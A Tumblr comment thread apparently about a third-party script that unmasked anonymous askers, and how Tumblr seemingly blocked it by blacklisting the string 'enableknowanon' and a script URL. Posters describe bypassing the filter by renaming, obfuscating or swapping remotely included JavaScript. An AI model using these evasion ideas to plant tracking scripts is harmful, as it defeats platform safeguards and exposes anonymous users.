I predict the next stop is to do this check server side.
Where it will take an entire five seconds to go around.
tbh i’d like to think that tumblr took a couple more steps than just this to fix the issue and that this was just like, an extra precautionary step, but EVEN SO it would still be incredibly funny bc it’s just so ……………….. i can’t even describe it, like, either someone at tumblr actually thought this would completely stump people OR they think the tumblr userbase is so completely incompetent that they wouldn’t figure it out? yikes
ALSO IF U GOT THE TIME/EFFORT COULD YOU EXPLAIN HOW DOING THE CHECK SERVER-SIDE WOULD BE EASY TO GO AROUND … i’ve got almost no background in webdev whatsoever; i thought usually you want to do validations/checks like this on the backend?
You do! However when you start letting users remote include code (say like linking javascript) it becomes tricky. They always have the option of obfuscating the javascript they send to you, or taking the remote JS and replacing it with something else after you’ve done the check server side, or being really sneaky and serving you one script and something to everyone else! Which is why you never never ever trust user input.
OK I AM SUPER TIRED AND COMPLETELY LOSING IT BUT I KEPT READING THAT WHEN PPL TRIED TO COPY-PASTE THE FIRST BIT OF JAVASCRIPT INTO THEIR CODE TUMBLR WOULDNT LET THEM AND I WANTED TO KNOW WHY AND IF IT’S WHAT I THINK IT IS IT’S INCREDIBLY FUNNY
when i tested it out, it refused to save by giving me a pop-up window that just said ‘woops :(’ (real helpful error message btw) so i started messin around. here’s the original snippet replicated from the post, bolded the important part
if you change that bolded block name to any other name, tumblr will let you save the code, no error messages whatsoever
on the other hand the names “IfEnableKnowAnons” and “IfTenableKnowAnon“ and evne "IfTenableKnowAnons” (all of which have the string ‘enableknowanons’ still intact, as bolded) both trigger the ‘woops’ error msg
so … i think …….. i suspect ………. that at least one of the things tumblr did to prevent people from using this code was just to blacklist the string ‘enableknowanon’ and this fucking CRACKS ME THE HELL UP
disclaimer: coudl be wrong, only deduced from fifteen minutes of trial-and-error in the customize form, not the most rigorous method of ascertaining anything would not recommend
last note: also think they blacklisted the string “media.pixellab.co/ka/script.js” GOD
Ahahah, tumblr that is the laziest thing ever.
I predict the next stop would be to do this check server side.
Where it will take an entire five seconds to go around.
